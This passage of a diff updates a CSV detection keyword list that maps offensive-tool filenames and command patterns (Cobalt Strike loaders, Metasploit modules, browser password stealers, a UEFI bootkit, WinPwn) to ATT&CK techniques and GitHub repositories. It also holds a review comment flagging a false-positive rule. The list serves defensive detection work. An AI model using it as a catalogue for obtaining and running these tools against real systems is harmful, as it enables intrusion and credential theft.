APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*BokuLoader.x64*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*bolt://localhost:7687*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" "*Bonfee/CVE-2022-0995*","offensive_tool_keyword","POC","CVE-2022-0995 exploit","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/Bonfee/CVE-2022-0995","1","1","N/A","N/A","5","490","71","2022-03-27T09:07:01Z","2022-03-26T21:46:09Z" "*BooExecutorImpl.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*bootkit-rs.git*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" -"*bootkit-rs-master*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*bootkit-rs.git*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - 
TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*bootkit-rs-master*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*BorjaMerino*Pazuzu*","offensive_tool_keyword","Pazuzu","Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.","T1055 - T1027 - T1071 - T1059","TA0002 - TA0005 - TA0011","N/A","N/A","Exploitation tools","https://github.com/BorjaMerino/Pazuzu","1","1","N/A","N/A","3","213","70","2020-08-04T18:49:36Z","2015-10-05T12:23:17Z" "*Bot_MSF_Exp_*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Bot_Python_Poc_Log4j2_VMwareHorizon.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - 
T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
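Review bot: The `*bolt://localhost:7687*` row, which this hunk touches only to refresh `metadata_github_updated_at`, is keyed on the default Neo4j Bolt connection URI rather than on anything specific to autobloody. With `metadata_enable_endpoint_detection` set to `1` and severity `10`, it will presumably match any host running a Neo4j client, including defensive BloodHound deployments, so analysts would see a top-severity hit for benign activity. The row's `metadata_comment` is `N/A`; I would set it to a false-positive warning in the wording used elsewhere in this diff, e.g. `"default Neo4j Bolt URI - high risks of false positives"`, or narrow the keyword to an autobloody-specific string. The same row lists `T1076.001`, which does not appear to be a current ATT&CK technique ID (RDP is tracked as `T1021.001`), so the mapping is worth re-checking at the same time.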
@@ -7955,59 +8102,59 @@ "*breg query *HK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*breg_add_string_value*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*bremote_exec*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*breviaries -Properties DnsHostName*ms-Mcs-AdmPwd*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*breviaries -Properties DnsHostName*ms-Mcs-AdmPwd*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*brew install sniffer*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" "*bropper.py *","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*Bropper-main.zip*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*browser.keylog_file.write*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" "*browser_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 
profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*browser_autopwn*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*browser_autopwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*browser_autopwn2_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*browser_exploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*browser_exploit_server_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*browser_autopwn*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*browser_autopwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*browser_autopwn2_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*browser_exploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*browser_exploit_server_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*BrowserBookmarkDiscovery_BrowserHistory.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Browser-C2.git*","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" "*Browser-C2-master.zip*","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" -"*browserexploitserver.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*browserexploitserver.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*BrowserGhost-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*BrowserListener.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*BrowserListener.py*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Browser-password-stealer.git*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*Browser-password-stealer-master*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*browserpivot *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
